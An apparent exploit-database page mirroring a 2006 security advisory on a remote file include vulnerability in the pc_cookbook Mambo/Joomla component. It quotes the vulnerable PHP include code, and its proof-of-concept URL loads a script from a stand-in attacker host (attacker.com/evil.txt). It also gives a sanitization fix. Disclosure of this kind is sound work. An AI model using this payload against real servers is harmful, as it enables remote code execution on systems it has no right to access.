pc_cookbook Mambo/Joomla Component <= v0.3 Remote File Include Vulnerabilities
CVE
Category
Price
Severity
N/A
CWE-Other
$500
High
Author
Risk
Exploitation Type
Date
Unknown
High
Remote
2006-07-25
CPE PURL
cpe:cpe:/a:mambo:pc_cookbook:0.3 pkg:https://exploitalert.com/view-details/pc-cookbook-mambo-joomla-component-v0-3-remote-file-include-vulnerabilities
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006070066 Below is a copy: _ _____/_ ___ / | \_____ | __)_ / // ~ / | | \ ___ Y / | /_______ / ______ /___|_ /_______ /
/ / / /
.OR.ID
ECHO_ADV_37$2006
------------------------------------------------------------------------
-----------------------
[ECHO_ADV_37$2006] pc_cookbook Mambo/Joomla Component <= v0.3 Remote File Include Vulnerabilities
------------------------------------------------------------------------
-----------------------
Author : Ahmad Maulana a.k.a Matdhule
Date : July 10th 2006
Location : Indonesia, Jakarta
Web : http://advisories.echo.or.id/adv/adv37-matdhule-2006.txt
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
pc_cookbook Component
Application : pc_cookbook Component
version : 0.3
URL : http://www.dianthos.net & http://www.fisheye.gr/koyansblog
------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~~~
in folder com_pccookbook we found vulnerability script pccookbook.php.
-----------------------pccookbook.php----------------------
....
<?php
//pc_cookbook Component//
/**
* Content code
* @package hello_world
* Original @Copyright (C) 2005 Robert Prince
* @Copyright (C) 2005 Konstantinos (koyan) Kokkorogiannis
* @ All rights reserved
* @ pc_cookbook is Free Software
* @ Released under GNU/GPL License :
http://www.gnu.org/copyleft/gpl.html
* @version koyans 0.3
* @link http://www.dianthos.net & http://www.fisheye.gr/koyansblog
**/
global $mosConfig_absolute_path;
global $mosConfig_live_site;
// include language file, or default to english
if (file_exists ($mosConfig_absolute_path .
'/components/com_pccookbook/languages/' . $mosConfig_lang . '.php')) {
include_once ($mosConfig_absolute_path .
'/components/com_pccookbook/languages/' . $mosConfig_lang . '.php');
} else {
include_once ($mosConfig_absolute_path .
'/components/com_pccookbook/languages/english.php');
} // end if
?>
...
----------------------------------------------------------
Variables $mosConfig_absolute_path are not properly sanitized. When
register_globals=on
and allow_fopenurl=on an attacker can exploit this vulnerability with a
simple php injection script.
Proof Of Concept:
~~~~~~~~~~~~~~~~
http://[target]/[path]/components/com_pccookbook/pccookbook.php?mosConfi
g_absolute_path=http://attacker.com/evil.txt?
Solution:
~~~~~~~~
sanitize variabel $mosConfig_absolute_path in pccookbook.php
------------------------------------------------------------------------
---
Shoutz:
~~~~~~
~ solpot a.k.a chris, J4mbi H4ck3r for the hacking lesson :)
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama
~ newbie_hacker (at) yahoogroups (dot) com [email concealed], jasakom_perjuangan (at) yahoogroups (dot) com [email concealed]
~ #mardongan #jambihackerlink #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~~~~~
matdhule[at]gmail[dot]com
-------------------------------- [ EOF ]----------------------------------
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum